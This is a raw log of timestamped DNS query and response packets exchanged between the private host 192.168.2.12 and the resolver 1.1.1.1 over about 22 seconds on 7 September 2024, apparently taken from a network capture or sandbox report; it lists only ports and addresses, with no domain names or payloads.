                                                                                                                                                                    Sep 7, 2024 15:36:59.691108942 CEST53543751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.728172064 CEST5001753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.738739967 CEST53500171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.774940968 CEST5602753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.807564974 CEST53560271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.853281021 CEST6039453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.866523027 CEST53603941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.899960995 CEST6149153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.953507900 CEST53614911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.993830919 CEST5472553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.003757954 CEST53547251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.056436062 CEST6011153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.141144991 CEST53601111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.183274031 CEST5589453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.193919897 CEST53558941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.243721008 CEST5225053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.375938892 CEST53522501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.415781975 CEST5120453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.647910118 CEST53512041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.681247950 CEST4918353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.765017986 CEST53491831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.806215048 CEST5183953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.828073978 CEST53518391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.870105028 CEST5418753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.884423018 CEST53541871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.931442976 CEST6450453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:00.961601973 CEST53645041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.993681908 CEST6391053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.243402958 CEST6391053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.271121025 CEST53639101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.271169901 CEST53639101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.306516886 CEST5930453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.479393005 CEST53593041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.509387016 CEST5693953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.519570112 CEST53569391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.556329966 CEST5900053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.726289988 CEST53590001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.760921001 CEST5912453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:01.781614065 CEST53591241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.822807074 CEST6281953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.071460962 CEST6281953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.331204891 CEST53628191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.331254005 CEST53628191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.368850946 CEST5520453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.634386063 CEST5520453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.705471992 CEST53552041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.705550909 CEST53552041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.743729115 CEST5750553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.753119946 CEST53575051.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.791241884 CEST6428453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.800468922 CEST53642841.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.837421894 CEST6081753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.867152929 CEST53608171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.902796030 CEST6391553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:02.911844969 CEST53639151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.954786062 CEST5903653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:03.122755051 CEST53590361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:03.167072058 CEST6307453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:03.415565014 CEST6307453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:03.419294119 CEST53630741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:03.423445940 CEST53630741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:03.462685108 CEST6199453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:03.728287935 CEST6199453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:03.975033045 CEST53619941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:03.975048065 CEST53619941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.009599924 CEST5952453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.019716978 CEST53595241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.040599108 CEST6338553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.048192024 CEST53633851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.087584019 CEST5124453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.102230072 CEST53512441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.134357929 CEST5733153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.143749952 CEST53573311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.181664944 CEST5044553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.219166994 CEST53504451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.259907007 CEST4948853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.517925024 CEST53494881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.556344032 CEST5045353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.660995007 CEST53504531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.697459936 CEST6545453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:04.934899092 CEST53654541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.980221987 CEST5046453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.002939939 CEST53504641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.040910959 CEST6055053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.219029903 CEST53605501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.259773016 CEST5874053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.282846928 CEST53587401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.321983099 CEST6158953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.341167927 CEST53615891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.393168926 CEST5016753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.457081079 CEST53501671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.493845940 CEST6394353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.590169907 CEST53639431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.618866920 CEST6001053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.802103996 CEST53600101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.837502956 CEST6204453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.847287893 CEST53620441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.884380102 CEST5446453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.934675932 CEST53544641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.978379011 CEST6266153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:05.988132000 CEST53626611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.025002956 CEST5377653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.034851074 CEST53537761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.071873903 CEST6488353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.312051058 CEST53648831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.372659922 CEST4998253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.545121908 CEST53499821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.588223934 CEST6128553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.612621069 CEST53612851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.666305065 CEST5456853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.686511040 CEST53545681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.731077909 CEST5767553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.750179052 CEST53576751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.790637970 CEST5328253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.822874069 CEST53532821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.857383966 CEST5332853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:06.890636921 CEST53533281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.931247950 CEST5358753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:07.107115030 CEST53535871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:07.150424957 CEST5717353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:07.158893108 CEST53571731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:07.196876049 CEST4962353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:07.462210894 CEST4962353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:08.131088018 CEST53496231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.131099939 CEST53496231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.165755987 CEST5636853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:08.174427986 CEST53563681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.212625980 CEST5664753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:08.225368977 CEST53566471.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.260111094 CEST5854453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:08.525278091 CEST5854453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:08.533598900 CEST53585441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.786911964 CEST53585441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:09.809757948 CEST5752353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:09.829571962 CEST53575231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:09.837402105 CEST5254253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:09.847661018 CEST53525421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:09.884326935 CEST5787653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.055752993 CEST53578761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.087533951 CEST5360153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.352996111 CEST5360153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.407480955 CEST53536011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.407493114 CEST53536011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.447669029 CEST6242453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.461808920 CEST53624241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.509358883 CEST6205953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.774590015 CEST6205953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.843898058 CEST53620591.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.844384909 CEST53620591.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.886909008 CEST4948453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:10.979583979 CEST53494841.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.009421110 CEST6535053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.019215107 CEST53653501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.056525946 CEST5195653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.088404894 CEST53519561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.134510994 CEST6236553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.147972107 CEST53623651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.184410095 CEST5827553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.193886042 CEST53582751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.228287935 CEST5797853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.239294052 CEST53579781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.275042057 CEST5491553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.446554899 CEST53549151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.478112936 CEST4980953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.559540987 CEST53498091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.588049889 CEST4984853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.690069914 CEST53498481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.729950905 CEST5100953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.739208937 CEST53510091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.775151014 CEST6337453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.873548031 CEST53633741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.916693926 CEST6361053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:11.939261913 CEST53636101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.978622913 CEST5918553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:12.228130102 CEST5918553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:12.237188101 CEST53591851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:12.288393021 CEST53591851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:12.822091103 CEST6056553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.071739912 CEST6056553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.328521013 CEST53605651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.328716040 CEST53605651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.369013071 CEST6312053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.422538996 CEST53631201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.488914967 CEST5546653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.743724108 CEST5546653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.814673901 CEST53554661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.814704895 CEST53554661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.853343010 CEST6519953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:13.898941994 CEST53651991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.931818962 CEST4944053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.071604967 CEST53494401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.105253935 CEST6303953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.206991911 CEST53630391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.246469975 CEST5121853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.265917063 CEST53512181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.306297064 CEST5820653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.335707903 CEST53582061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.368745089 CEST5075653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.425371885 CEST53507561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.462640047 CEST6214953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.512845993 CEST53621491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.556370020 CEST5019753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.791218996 CEST53501971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.823380947 CEST6079853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.840622902 CEST53607981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.853065014 CEST6313753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:14.860497952 CEST53631371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.884361029 CEST5421953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:15.133955956 CEST5421953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:15.151074886 CEST53542191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.151082039 CEST53542191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.196871042 CEST5285053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:15.389050007 CEST53528501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.416928053 CEST5882153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:15.427287102 CEST53588211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.462446928 CEST5967653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:15.727694035 CEST5967653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.303540945 CEST53596761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.303953886 CEST53596761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.346137047 CEST5089053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.515259027 CEST53508901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.540668964 CEST5392253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.563863039 CEST53539221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.603156090 CEST5578353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.616290092 CEST53557831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.665637016 CEST5667653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.692637920 CEST53566761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.743959904 CEST5857753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.909842014 CEST53585771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.947451115 CEST5707353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:16.956921101 CEST53570731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.993774891 CEST5324253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.161485910 CEST53532421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.197515011 CEST6272953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.230962992 CEST53627291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.275645971 CEST6535953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.307666063 CEST53653591.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.341031075 CEST5530653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.350683928 CEST53553061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.384494066 CEST5226453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.528151989 CEST53522641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.557090998 CEST5013653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:17.733427048 CEST53501361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.759582043 CEST6059753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.009737015 CEST6059753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.038391113 CEST53605971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.040738106 CEST53605971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.089355946 CEST5717553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.337280989 CEST5717553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.377717018 CEST53571751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.378998041 CEST53571751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.416306019 CEST5998453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.430648088 CEST53599841.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.462641954 CEST5783853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.712544918 CEST5783853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.780553102 CEST53578381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.780649900 CEST53578381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.806864023 CEST6346953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:18.987183094 CEST53634691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.009794950 CEST5270053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.112498045 CEST53527001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.150342941 CEST5924353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.324158907 CEST53592431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.353133917 CEST5441653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.516436100 CEST53544161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.540642977 CEST6154853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.699996948 CEST53615481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.750860929 CEST6515753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.760401011 CEST53651571.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.812551022 CEST5342353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.836388111 CEST53534231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.844047070 CEST6190453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:19.851564884 CEST53619041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.884398937 CEST6393953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.057009935 CEST53639391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.088496923 CEST6350753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.314250946 CEST53635071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.338969946 CEST5027953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.385356903 CEST53502791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.419686079 CEST6032953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.518820047 CEST53603291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.557590008 CEST5933553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.572892904 CEST53593351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.603203058 CEST6269453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.666727066 CEST53626941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.696926117 CEST5489453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:20.813088894 CEST53548941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:20.838351011 CEST5909453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:21.085663080 CEST53590941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.120228052 CEST5982553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:21.134151936 CEST53598251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.166321039 CEST6131353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:21.336038113 CEST53613131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.368742943 CEST5070153192.168.2.121.1.1.1
